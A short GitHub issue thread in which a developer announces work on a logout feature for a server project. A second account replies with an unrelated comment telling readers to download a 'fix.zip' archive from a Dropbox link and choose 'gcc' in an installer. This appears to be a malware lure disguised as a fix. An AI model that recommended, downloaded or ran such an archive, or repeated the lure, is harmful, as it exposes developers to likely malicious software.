### ISSUE TITLE
로그아웃 기능 구현

### ISSUE THREAD

**Issue by ta2ye0n** [Team-Wander/Wandering-Server#21]
### Summary

로그아웃 기능을 구현하겠습니다

**Comment by Wanderx13** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."
